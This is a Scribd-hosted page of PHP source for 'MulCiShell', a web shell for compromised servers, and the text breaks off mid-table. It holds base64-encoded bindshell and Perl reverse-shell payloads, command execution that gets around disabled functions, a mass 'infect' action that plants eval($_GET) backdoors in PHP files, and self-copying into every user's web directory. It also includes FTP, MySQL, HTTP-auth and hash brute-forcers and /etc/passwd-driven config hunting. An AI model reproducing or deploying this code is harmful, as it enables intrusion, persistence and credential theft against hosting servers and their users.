Scribd Logo
Hochladen

Willkommen bei Scribd!

  • Shell

    Hochgeladen von

    crsharp
    48 Ansichten29 Seiten

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Verfügbare Formate

    TXT, PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    48 Ansichten29 Seiten

    Shell

    Hochgeladen von

    crsharp

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 29

    <?php #/\/\/\/\/\ MulCiShell v0.2 /\/\/\/\/\/\/\# # Updates from version 1.

    0# # 1) Fixed MySQL insert function # 2) Fixed trailing dirs # 3) Fixed file-editing when set to 777 # 4) Removed mail function (who needs it?) # 5) Re-wrote & improved interface # 6) Added actions to entire directories # 7) Added config+forum finder # 8) Added MySQL dump function # 9) Added DB+table creation, DB drop, table delete, and column+table count # 10) Updated security-info feature to include more useful details # 11) _Greatly_ Improved file browsing and handling # 12) Added banner # 13) Added DB-Parser and locator # 14) Added enumeration function # 15) Added common functions for bypassing security restrictions # 16) Added bindshell & backconnect (needs testing) # 17) Improved command execution (alts) #/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/# @ini_set("memory_limit","256M"); @set_magic_quotes_runtime(0); session_start(); ob_start(); $start=microtime(); if(isset($_GET['theme'])) $_SESSION['theme']=$_GET['theme']; //Thanks korupt ;) $backdoor_c="DQojaW5jbHVkZSA8YXNtL2lvY3Rscy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQo jaW5jbHVkZSA8c3lzL3NlbGVjdC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN 0ZC5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8bmV 0ZGIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5 jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGludC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQ uaD4NCg0Kdm9pZCAqQ2xpZW50SGFuZGxlcih2b2lkICpjbGllbnQpDQp7DQoJaW50IGZkID0gKGludCl jbGllbnQ7DQoJZHVwMihmZCwgMCk7DQoJZHVwMihmZCwgMSk7DQoJZHVwMihmZCwgMik7DQoJaWYoZm9 yaygpID09IDApDQoJCWV4ZWNsKCIvYmluL2Jhc2giLCAicmVzbW9uIiwgMCk7DQoJY2xvc2UoZmQpOw0 KCXJldHVybiAwOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKQ0Kew0KCWludCB tc29jaywgY3NvY2ssIGkgPSAxOw0KCXB0aHJlYWRfdCB0aHJlYWQ7DQoJc3RydWN0IHNvY2thZGRyIHN hZGRyOw0KCXN0cnVjdCBzb2NrYWRkcl9pbiBzYWRkckluOw0KICAgIGludCBwb3J0PWF0b2koYXJndls xXSk7DQoJaWYoKG1zb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBJUFBST1RPX1RDUCk pID09IC0xKQ0KCQlyZXR1cm4gLTE7DQoNCglzYWRkckluLnNpbl9mYW1pbHkJCT0gQUZfSU5FVDsNCgl zYWRkckluLnNpbl9hZGRyLnNfYWRkcgk9IElOQUREUl9BTlk7DQoJc2FkZHJJbi5zaW5fcG9ydAkJPSB odG9ucyhwb3J0KTsNCiAgIA0KCW1lbWNweSgmc2FkZHIsICZzYWRkckluLCBzaXplb2Yoc3RydWN0IHN vY2thZGRyX2luKSk7DQoJc2V0c29ja29wdChtc29jaywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCA oY2hhciAqKSZpLCBzaXplb2YoaSkpOw0KIA0KCWlmKGJpbmQobXNvY2ssICZzYWRkciwgc2l6ZW9mKHN hZGRyKSkgIT0gMCl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiANCglpZihsaXN 0ZW4obXNvY2ssIDEwKSA9PSAtMSl7DQoJCWNsb3NlKG1zb2NrKTsNCgkJcmV0dXJuIC0xOw0KCX0NCiA NCgl3aGlsZSgxKXsNCgkJaWYoKGNzb2NrID0gYWNjZXB0KG1zb2NrLCBOVUxMLCBOVUxMKSkgIT0gLTE pew0KCQkJcHRocmVhZF9jcmVhdGUoJnRocmVhZCwgMCwgaGFuZGxlciwgKHZvaWQgKiljc29jayk7DQo JCX0NCgl9DQoJDQoJcmV0dXJuIDE7DQp9"; $backconnect_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KbXkgKCRpYWRkciwkcG9yd CwkY21kKT1AQVJHVjsNCm15ICRwYWRkcj1zb2NrYWRkcl9pbigkcG9ydCwgaW5ldF9hdG9uKCRpYWRkc ikpOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0Kc29ja2V0KFNPQ0tFVCwgUEZfS U5FVCwgU09DS19TVFJFQU0sICRwcm90byk7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKTsNCm9wZW4oU 1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERJTiwiPiZTT0NLRVQiKTsNCnByaW50IFNPQ0tFVCAiU 2hlbGwgdGVzdFxuIjsNCnByaW50IGV4ZWMoJGNtZCk7DQpjbG9zZShTVERJTik7DQpjbG9zZShTVERPV VQpOw0K"; $pl_scan="DQoJIyEvdXNyL2Jpbi9wZXJsDQp1c2Ugd2FybmluZ3M7DQp1c2Ugc3RyaWN0Ow0KdXNlIG RpYWdub3N0aWNzOw0KdXNlIElPOjpTb2NrZXQ6OklORVQ7DQpzdWIgdXNhZ2UNCnsNCglkaWUoIiQwIG hvc3Qgc3RhcnRwb3J0IGVuZHBvcnQKIik7DQp9DQp1c2FnZSB1bmxlc3MoQEFSR1Y+MSk7DQpteSgkaG

    9zdCwkcywkZSk9QEFSR1Y7DQpmb3JlYWNoKCRzLi4kZSkNCnsNCglteSAkc29jaz1JTzo6U29ja2V0Oj pJTkVULT5uZXcNCgkoDQoJCVBlZXJBZGRyPT4kaG9zdCwNCgkJUGVlclBvcnQ9PiRfLA0KCQlQcm90bz 0+J3RjcCcsDQoJCVRpbWVvdXQ9PjINCgkpOw0KCXByaW50ICJQb3J0ICBvcGVuCiIgaWYgKCRcc29jay k7DQp9DQoNCgk="; $access_control=0; $md5_user="BoN"; $md5_pass="12345"; $user_agent="BoN"; $allowed_addrs=array('127.0.0.1'); $shell_email="zizad_l33t@hotmail.com"; $self=basename($_SERVER['PHP_SELF']); $addr=$_SERVER['REMOTE_ADDR']; $serv=@gethostbyname($_SERVER['HTTP_HOST']); $soft=$_SERVER['SERVER_SOFTWARE']; $safe_mode=(@ini_get("safe_mode")=='')?"OFF":"ON"; $open_basedir=(@ini_get("open_basedir")=='')?"OFF":"ON"; $uname=@php_uname(); $space=TrueSize(disk_free_space(realpath(getcwd()))); $total=TrueSize(disk_total_space(realpath(getcwd()))); $id=@execmd("id",$disable); $int_paths=array("mybb","phpbb","phpbb3","forum","forums","board","boards","bb", "discuss"); $inc_paths=array("includes","include","inc"); $sql_build_path; echo "<script type=\"text/javascript\" language=\"javascript\"> function togglecheck() { var cb=document.forms[0].check for (i in cb) { cb[i].checked=(cb[i].checked)?false:true; } } </script>"; switch($access_control) #Break statements intentionally ommited { case 3: $ip_allwd=false; foreach($allowed_addrs as $addr) { if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;} if(!$ip_allwd) exit; } case 2: if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user|| $_SERVER['PHP_AUTH_PW']!=$md5_pass) { header("WWW-Authenticate: Basic Realm=\"Restricted area\""); header("HTTP/1.1 401 Unauthorized"); echo "Wrong username/password"; exit; } case 1: if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit; } if($id) { $s=strpos($id,"(",0)+1; $e=strpos($id,")",$s); $idval=substr($id,$s,$e-$s);

    } $disable=@ini_get("disable_functions"); if(empty($disable)) $disable="None"; function rm_rep($dir,&$success,&$fail) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$rm=readdir($dh))) { if($rm=='.' || $rm=='..') continue; if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...</br>"; rm_r ep($dir.'/'.$rm,$success,$fail); continue;} if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...</br>";} else {$fail++; echo "Failed to delete $rm</br>";} } @closedir($dh); } else echo "Failed to open dir $dir</br>"; } function chmod_rep($dir,&$success,&$fail,$mod_value) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$ch=readdir($dh))) { if($ch=='.' || $ch=='..') continue; if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch. ..</br>"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;} if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode f or $ch...</br>";} else {$fail++; echo "Failed to chmod $rm</br>";} } @closedir($dh); } else echo "Failed to open dir $dir</br>"; } #Complete these functions function spread_self($user,&$c=0,$d=0) { if(!$d) $dir="/home/$user/public_html/"; else $dir=$d; if(is_dir($dir)&&is_writable($dir)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir. $f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php</br>"; $c++; } if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir</br>"; while((@$f=readdir($dh))) { if($f!="."&&$f!="..") { if(@is_dir($dir.$f)) { echo "[+] Spreading to dir $dir</br>"; if(@is_writable($dir.$f)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_S ELF']),$dir.$f.'/mshell.php');

    echo "[+] Shell copied to $dir.$f./mshell.php</br>"; $c++; } $c+=spread_self($user,$c,$dir.$f.'/'); } } } } function copy_rep($dir,&$c) { } function backup_site() { if(!isset($_POST['busite'])) { echo "<center>The following tool will attempt to retrieve every file fro m the specified dir (including child dirs).</br>If successful, you will be promp ted for a site backup download.</br><i>Note: Only readable files will be downloa ded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source.</i></center>"; } } function infect_rep($dir,&$success,&$fail) { } function copy_dir($dir,$new_dir) { } ################################## function execmd($cmd,$d_functions="None") { if($d_functions=="None") {$ret=passthru($cmd); return $ret;} $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); $d_functions=str_replace(" ","",$d_functions); $dis_funcs=explode(",",$d_functions); foreach($funcs as $safe) { if(!in_array($safe,$dis_funcs)) { if($safe=="exec") { $ret=@exec($cmd); $ret=join("\n",$ret); return $ret; } elseif($safe=="system") { $ret=@system($cmd); return $ret; } elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; } elseif($safe=="shell_exec") { $ret=@shell_exec($cmd);

    return $ret; } elseif($safe=="popen") { $ret=@popen("$cmd",'r'); if(is_resource($ret)) { while(@!feof($ret)) $read.=@fgets($ret); @pclose($ret); return $read; } return -1; } elseif($safe="proc_open") { $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') ); $resource=@proc_open($cmd,$cmdpipe,$pipes); if(@is_resource($resource)) { while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]); @fclose($pipes[1]); @proc_close($resource); return $ret; } return -1; } } } return -1; } $links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"= >"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode", "Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf", "Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?a ct=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Sprea d Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill"); echo "<html><head><title>MulCiShell v2.0</title></head>"; switch($_SESSION['theme']) { case 'green': echo "<style> body{color:#66FF00; font-size: 12px; font-family: serif; backgroundcolor: black;} td {border: 1px solid #00FF00; background-color:#001f00; padding: 2p x; font-size: 12px; color: #33FF00;} td:hover{background-color: black; color: #33FF00;} input{background-color: black; color: #00FF00; border: 1px solid gre en;} input:hover{background-color: #006600;} textarea{background-color: black; color: #00FF00; border: 1px solid white;} a {text-decoration: none; color: #66FF00; font-weight: bold;} a:hover {color: #00FF00;} select{background-color: black; color: #00FF00;} #main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: ce

    nter;} #main a{padding-right: 15px; color:#00CC00; font-size: 12px; font-fa mily: arial; text-decoration: none; } #main a:hover{color: #00FF00; text-decoration: underline;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; paddin g: 5px;} </style> <body>"; break; case 'dark': echo "<style> body{color: #FFFFFF; font-size: 12px; font-family: serif; background -color: #000000;} td {border: 1px solid #FFFFFF; background-color: #000000; padding: 2 px; font-size: 12px; color: #FFFFFF;} input{background-color: black; color: #FFFFFF;; border: 1px solid #F FFFFF;} input:hover{background-color: #000099;} textarea{background-color: #000000; color: #FFFFFF; border: 1px soli d white;} a {text-decoration: none; color: #FFFFFF; font-weight: bold;} a:hover {font-weight: bold;} select{background-color: #000000; color: #FFFFFF;} #main{border-bottom: 1px solid white; padding: 5px; text-align: cent er;} #main a{padding-right: 15px; color:#FFFFFF; font-size: 12px; font-fa mily: arial; text-decoration: none; } #main a:hover{font-weight: bold;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; paddin g: 5px;} </style><body>"; break; default: echo "<style> body{color: white; font-size: 12px; font-family: arial; scrollbar-ba se-color:blue; scrollbar-arrow-color:yellow; scrollbar-face-color:blue; } td {border: 1px solid #000099; background-color: #000033; padding: 2 px; font-size: 12px; color: white; } input{background-color: black; color: white; border: 1px solid #0000 66;} input:hover{background-color: #000066; border: 1px solid white;} td:hover {color: yellow; background: black;} textarea{background-color: #000033; color: white; border: 1px solid white;} a {text-decoration: none; color: white; font-weight: bold;} a:hover {color: yellow} select{background-color: black; color: white;} #main{border-bottom: 1px solid #0066FF; padding: 5px; text-align: ce nter;} #main a{padding-right: 15px; color: white; font-size: 12px; font-fam ily: arial; text-decoration: none; } #main a:hover{color: #0033FF; text-decoration: underline;} #bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; paddin g: 5px;} </style> <body bgcolor='black'>"; break;

    } echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2su dXMvaW1nNTI5LzExNjYv bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg=="); echo "<table style='width: inherit; margin: auto; text-align: center;'> <tr><td>Server IP</td><td>Your IP</td><td>Disk space</td><td>Safe_mode?</td><td> Open_BaseDir?</td><td>System</td><td>Server software</td><td>Disabled functions< /td><td>ID</td><td>Shell location</td></tr> <tr><td>$serv</td><td>$addr</td><td>$space of $total</td><td>$safe_mode</td><td> $open_basedir</td><td>$uname</td><td>$soft</td><td>$disable</td><td>$idval</td>< td>".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."</td></tr> </table></br> <div id='main'>"; foreach($links as $val=>$addr) echo "<a href='$addr'>[ $val ]</a>"; echo "</div><br>"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo "<form action='$self?' method='post'><center><textarea rows='19' cols=' 75' readonly>MD5: ".md5($e)."\nSHA1: ".sha1($e)."\nCrypt: ".crypt($e)."\nCRC32: ".crc32($e)."\nBase64 Encoded: ".base64_encode($e)."\nBase64 decoded: ".base64_d ecode($e)."\nURL encode: ".urlencode($e)."\nURL decode: ".urldecode($e)."\nBin2H ex ".bin2hex($e)."\nDec2Hex: ".dechex($e)."</textarea><br><br>Input: <input type ='text' style='width: 300px' name='encrypt'> <br><input type='submit' value='Encrypt' name='encryption'></center>"; } if(isset($_POST['dogetfile'])) execmd("wget $_POST[wgetfile]",$disable); if(isset($_POST['doUpload'])) { $dir=$_POST['u_location']; $name=$_FILES['u_file']['name']; switch($_FILES['u_file']['error']) { case 0: if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name)) echo "File uploaded successfully<br>"; else echo "Failed to upload file!"; } } if(isset($_POST['massfiles'])) { $fail=0; $success=0; switch($_POST['fileaction']) { case 'Infect': #Nothing special here, just kick them while they're down foreach($_POST['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh)) { $success++; @fwrite($fh,"<?php @eval(\$_GET['e']) ?>"); @fclose($fh); } else $fail++; } echo "Successfully infected $success files; failed to infect $fail files

    </br>Exploit files as such: file.php?e=php code"; break; case 'Delete': foreach($_POST['files'] as $file) { if(is_dir($file)) rm_rep($file,$success,$fail); else { if(@unlink(CleanDir($file))) { echo "File $file deleted<br>"; $success++; } else { echo "Failed to delete file $file<br>"; $fail++; } } } echo "Total files deleted: $success; failed to delete $fail files<br>"; break; case 'Chmod': foreach($_POST['files'] as $file) { if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']); if(@chmod(CleanDir($file),$_POST['cmodv'])) { echo "Changed mode for $file<br>"; $success++; } else { echo "Failed to change mode for $file<br>"; $fail++; } } echo "Total files modes modified: $success; failed to chmod $fail files< br>"; break; } } if(isset($_POST['docrack'])) { $con=true; $show=0; $list=@fopen($_FILES['wordlist']['tmp_name'],'r'); if(is_resource($list)) { if(isset($_POST['ftpcrack'])) { echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...</br>"; if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port']; else $port='3306'; if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST[ 'ftp_timeout'])) $time=3; else $time=$_POST['ftp_timeout']; @$ftp=ftp_connect($_POST['ftp_host'],$port,$time); if(!$ftp) $con=false;

    if($con) { $show++; while(!feof($list)) { @$pass=fgets($list); if(ftp_login($ftp,$_POST['ftp_user'],trim($pass))) { echo "Password found! Password for $_POST[ftp_user] is $pass<br>"; @ftp_close($ftp); break; } if($show==10000){echo "Trying pass $pass...</br>"; $show =0;} } } else echo "Failed to connect!</br>"; } elseif(isset($_POST['remote_login'])) { //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled."); /* $ch=curl_init($_POST['remote_login_target']); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,''); curl_exec($ch); */ if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) di e("Do not include http:// in the target URL."); $path=explode('/',$_POST['remote_login_target']); $site=$path[0]; for($i=1;$i<count($path);$i++) $full_path.='/'.$path[$i]; } elseif(isset($_POST['vbcrack'])) { if(empty($_POST['vbhash']) OR empty($_POST['vbsalt'])) die("Plea se specify a hash and salt"); while(!feof($list)) { $show++; $pass=trim(fgets($list)); $vbenc=md5(md5($pass).$_POST['vbsalt']); if($vbenc===$_POST['vbhash']) { echo "Password for $_POST[vbhash] found! is $pass</br>"; break; } if($show===10000) { $show=0; echo "Trying pass $pass...</br>"; } } echo "Complete</br>"; } elseif(isset($_POST['mysqlcrack'])) {

    $host=$_POST['mysql_host']; $user=$_POST['mysql_user']; if(!empty($_POST['mysql_port'])) $host.=":$_POST[mysql_port]"; while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(@mysql_connect($host,$user,$pass)) { echo "Password found! Password for $user is $pass</b r>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } elseif(isset($_POST['authcrack'])) { $arr=explode('/',$_POST['auth_url']); $con_url=$arr[0]; if(empty($_POST['auth_url'])) die("Enter a target first..."); for($i=1;$i<count($arr);$i++) $path.='/'.$arr[$i]; if(preg_match("/^http:\/\/+/",$_POST['auth_url'])) die("Do not i nclude http:// in the url"); while(!feof($list)) { if(is_resource($conn_url=fsockopen($con_url,80,$errno,$e rrstr,5))) { $show++; $pass=trim(fgets($list)); if($show>5000) {$show=0; echo $pass;} $encode=base64_encode(trim($_POST['auth_user']).':'. $pass); $header="GET $path HTTP/1.1\r\n"; $header.="Host: $con_url\r\n"; $header.="Authorization: Basic $encode\r\n"; $header.="Connection: Close\r\n\r\n"; fputs($conn_url,$header,strlen($header)); $tmp++; while(!feof($conn_url)) { $tmp=fgets($conn_url); if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp)) { echo "Password found! Password=$pass</br></b r>"; break 2; } } } } echo "Done</br>"; } elseif(isset($_POST['md5crack']))

    { if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)"); $md5=trim($_POST['md5hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(md5($pass)===$md5) { echo "Password found! Plaintext for $md5 is $pass</br>"; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } elseif(isset($_POST['sha1crack'])) { if(empty($_POST['sha1hash'])) die("Enter a hash before attemptin g to crack one ;)"); $sha1=trim($_POST['sha1hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(sha1($pass)===$sha1) { echo "Password found! Plaintext for $sha1 is $pass</br>" ; break; } if($show==10000) { echo "Trying $pass...</br>"; $show=0; continue; } } } } @fclose($list); } if(isset($_POST['port_scan'])) { switch($_POST['type']) { case 'php': extract($_POST); while($sport<=$eport) { echo "Trying port $sport"; if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open</br>"; $sport++; }

    break; default: echo "Invalid request</br>"; } } if(isset($_POST['find_forums'])) { echo "<center><b>[ Forum locator ]</b></center></br></br>"; $found=0; global $int_paths; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html"; if(@is_dir($path)) { foreach($int_paths as $forum_path) { $full_path=$path."/$forum_path/"; if(@is_dir($full_path)) { echo "[+] Forum found: Path: $full_path</br>"; $found++; continue; } } } } echo "Scan complete. Found $found forums</br></br>"; } function find_configs($path,&$found) { if(@file_exists($path.'config.php')) { echo "Found config file: $path"."config.php</br>"; $found++; } @$dh=opendir($path); while((@$file=readdir($dh))) if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/', $found); @closedir($dh); } if(isset($_POST['find_configs'])) { $found=0; echo "<center><b>[ Config locator ]</b></center></br></br>"; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html/"; find_configs($path,$found); } @fclose($fp); echo "Scan complete. Found $found configs</br></br>"; } if(isset($_POST['execmd'])) {echo "<center><textarea rows='10' cols='100'>";

    echo execmd($_POST['cmd'],$disable); echo "</textarea></center>";} if(isset($_POST['execphp'])) {echo "<center><textarea rows='10' cols='100'>"; echo eval(stripslashes($_POST['phpcode'])); echo "</textarea></center>";} if(isset($_POST['cnewfile'])) { if(@fopen($_POST['newfile'],'w')) echo "File created<br>"; else echo "Failed to create file<br>"; } if(isset($_POST['cnewdir'])) { if(@mkdir($_POST['newdir'])) echo "Directory created<br>"; else echo "Failed to create directory<br>"; } if(isset($_POST['doeditfile'])) FileEditor(); switch($_GET['act']) { case 'backc': if(!isset($_POST['backconnip'])) { echo "<center><form action='$self?act=backc' method='post'> Address: <input type='text' value='$_SERVER[REMOTE_ADDR]' name='backconn ip'> Port: <input type='text' value='1337' name='backconnport'> <input type='submit' value='Connect'></br></br> Listen with netcat by executing 'nc -l -n -v -p 1337'</br></br> <b>Note: Be sure to foward your port first</b> </form></center>"; } else { if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Spec ify a host/port"); if(is_writable(".")) { @$fh=fopen(getcwd()."/bc.pl",'w'); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...</br>"; execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnpo rt]",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FF0000'>Warning: Failed to delete reverse-connection program</font></br>"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...</br>"; if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warni ng: Failed to delete reverse-connection program<</h2>/font></br>"; } } break; case 'dbs': database_tools(); break; case 'sql': SQLLogin(); break; case 'sqledit': SQLEditor(); break; case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from M ySQL.<br>"; break;

    case 'f': FileEditor(); break; case 'encode':Encoder(); break; case 'bypass':security_bypass(); break; case 'bf':brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if(!isset($_POST['spread_shell'])) { echo "<center><form action='?act=spread' method='post'> This tool will attempt to copy the shell into every writable directory o n the server, in order to allow access maintaining.</br> Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'>< /br> <input type='submit' value='Spread' name='spread_shell'> </form></center>"; } else { $s=0; @$file=fopen($_POST['passwd_file'],'r'); if(is_resource($file)) { while(!feof($file)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fi le)); spread_self($user,$s); } @fclose($file); } echo ($s>0)?"Spread complete. Successfully managed to spread the shell $ s times</br>":"Failed to spread the shell.</br>"; } break; case 'domains': $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\ n"; $header.="Host: searchy.protecus.de\r\n"; $header.="Connection: Close\r\n\r\n"; $domain_handle=fsockopen("searchy.protecus.de",80); @fputs($domain_handle,$header,strlen($header)); while(@!feof($domain_handle)) { echo fgets($domain_handle); } break; case 'kill': if(!isset($_POST['justkill'])) { echo "<center>Do you *really* want to kill the shell?<br><br><form actio n='$self?act=kill' method='post'> <input type='submit' value='Yes' name='justkill'></center>"; } else { if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.<br>"; else echo "Failed to delete shell<br>"; } break; case 'sec': $mysql_on=function_exists("mysql_connect")?"ON":"OFF"; $curl_on=function_exists("curl_init")?"ON":"OFF"; $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF"; $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON";

    $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; $ver=phpversion(); echo "<center>Security overview</center><table style='margin: auto;'><tr><td >PHP Version</td><td>Safe mode</td><td>Open_Basedir</td><td>Magic_Quotes</td><td >Register globals</td><td> Remote includes</td><td>Read /etc/passwd?</td><td>MySQL</td><td>cURL</td></t r> <tr><td>$ver</td><td>$safe_mode</td><td>$open_basedir</td><td>$magic_quotes_ on</td><td>$register_globals_on</td><td>$include_on</td> <td>$etc_passwd</td><td>$mysql_on</td><td>$curl_on</td> </tr>"; "</table>"; break; case 'enum': $windows=0; $path=CleanDir(getcwd()); if(!eregi("Linux",php_uname())) {$windows=1;} if(!$windows) { $spath=str_replace("/home/","$serv/~",$path); $spath=str_replace("/public_html/","/",$spath); $URL="http://$spath/".basename($_SERVER['PHP_SELF']); echo "Enumerated shell link: <a href='$URL'>$URL</a>"; } else echo "Enumeration failed<br>"; break; } echo "<br>"; if(isset($_POST['sqlquery'])) { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_POST['db'])) @mysql_select_db($_POST['db']); $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_ error()); $affected=@mysql_num_rows($post_query); echo "Affected rows: $affected<br>"; } } $dirs=array(); $files=array(); if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or di e("Permission denied!");} else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denie d!");} $current=explode("/",$d); echo "<table style='width: 100%; text-align: center;'><tr><td>Current location: ";for($p=0;$p<count($current);$p++) for($p=0;$p<count($current);$p++) { $cPath.=$current[$p].'/'; echo "<a href=$self?d=$cPath>$current[$p]</a>/"; } echo "</td></tr></table>"; if(isset($_GET['d'])) echo "<form action='$self?d=$_GET[d]' method='post'>"; else echo "<form action='$self?' method='post'>"; echo "<table style='width: 100%'> <tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Writable</td

